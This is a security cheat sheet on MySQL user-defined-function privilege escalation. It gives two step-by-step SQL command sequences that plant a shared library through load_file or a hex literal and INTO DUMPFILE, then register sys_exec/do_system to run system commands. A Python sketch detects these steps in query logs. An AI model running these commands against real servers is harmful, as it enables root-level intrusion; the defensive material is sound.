# MySQL exploit

## MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit

### Requirements

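1. MySQL running as root
2. Insecure handling of files: the session can read and write server-side files (`load_file`, `INTO DUMPFILE`)
3. Knowledge of the plugin directory (`SELECT @@plugin_dir;`)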

### .so file download

Download from [github:metasploit-framework](https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql)

#### Method 1 (access to box):

```bash
mysql -uroot -p<PASS>
> USE mysql;
> CREATE table kashz(line blob);
> INSERT INTO kashz VALUES(load_file('/PATH/udf.so'));
> SELECT * FROM kashz INTO dumpfile '/PLUGIN-DIR/udf.so';

# create function 
> CREATE FUNCTION do_system RETURNS integer soname 'udf.so';
> SELECT * from mysql.func;

# run RCE
> SELECT do_system('RCE');
```

#### Method 2 (no access to box):

* Hex-encode the `.so` file (the output is the `<SHELLCODE-DATA>` value used below): `xxd -p udf.so | tr -d '\n' > udf.so.hex`

```bash
> SELECT @@plugin_dir;
> SET @shell = 0x<SHELLCODE-DATA>;
> SELECT binary @shell into dumpfile 'PLUGIN-DIR/udf.so';

# create function
> CREATE FUNCTION sys_exec RETURNS int soname 'udf.so';
> SELECT * FROM mysql.func;

# run RCE
> SELECT sys_exec('RCE');
```
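
Both methods leave the same trail in the MySQL general query log: a `.so` staged through `load_file` or a hex literal, written with `INTO DUMPFILE`, then registered with `CREATE FUNCTION ... SONAME`. The following detection sketch is an added example, not part of the original cheat sheet; the log layout, rule names and sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed general query log layout: timestamp, connection id, command, statement.
LINE = re.compile(r"^\S+\s+(\d+)\s+Query\s+(.*)$")

# One rule per step of the technique; rule names are hypothetical.
RULES = {
    # Method 1: a shared object read into a table with load_file()
    "load_file_so": re.compile(r"\bLOAD_FILE\s*\(\s*'[^']*\.so'", re.I),
    # Method 2: hex literal beginning with the ELF magic bytes 7f 45 4c 46
    "elf_hex_literal": re.compile(r"\b0x7f454c46[0-9a-f]*", re.I),
    # Both methods: a shared object written with INTO DUMPFILE
    "dumpfile_so": re.compile(r"\bINTO\s+DUMPFILE\s+'[^']*\.so'", re.I),
    # Both methods: a function registered from a shared library (SONAME)
    "create_udf": re.compile(
        r"\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+(?:IF\s+NOT\s+EXISTS\s+)?"
        r"\S+\s+RETURNS\s+\w+\s+SONAME\b", re.I),
}
STAGING = {"load_file_so", "elf_hex_literal", "dumpfile_so"}

def scan(lines):
    """Return {connection id: [rule names in log order]} for Query records."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # Connect/Quit records and continuation lines are skipped
        conn, stmt = int(m.group(1)), m.group(2)
        for name, rx in RULES.items():
            if rx.search(stmt) and name not in hits[conn]:
                hits[conn].append(name)
    return dict(hits)

def high_risk(hits):
    """Connections that staged a library and also registered a function from one."""
    return sorted(c for c, h in hits.items() if "create_udf" in h and STAGING & set(h))

# Constructed sample log (not real data); connection 12 replays Method 2.
SAMPLE_LOG = (
    "2024-05-01T10:00:01.000000Z\t   11 Connect\tapp@localhost on shop using Socket\n"
    "2024-05-01T10:00:02.000000Z\t   11 Query\tSELECT id, name FROM products WHERE id = 7\n"
    "2024-05-01T10:02:10.000000Z\t   12 Query\tSELECT @@plugin_dir\n"
    "2024-05-01T10:02:15.000000Z\t   12 Query\tSET @shell = 0x7f454c4602010100\n"
    "2024-05-01T10:02:20.000000Z\t   12 Query\tSELECT binary @shell into dumpfile '/PLUGIN-DIR/udf.so'\n"
    "2024-05-01T10:02:25.000000Z\t   12 Query\tCREATE FUNCTION sys_exec RETURNS int soname 'udf.so'\n"
    "2024-05-01T10:05:00.000000Z\t   13 Query\tCREATE FUNCTION add_tax(p DECIMAL(10,2)) "
    "RETURNS DECIMAL(10,2) DETERMINISTIC RETURN p * 1.2\n"
).splitlines()

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    print(found, high_risk(found))
```

The stored function on connection 13 has no `SONAME` clause and is not flagged; statements that span several log lines are not reassembled by this sketch.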

## References

* <https://www.exploit-db.com/exploits/1518>
* <https://github.sofianehamlaoui.fr/Security-Cheatsheets/databases/mysql/mysql-root-to-system-root/>
* <https://gist.github.com/p0c/8587757>
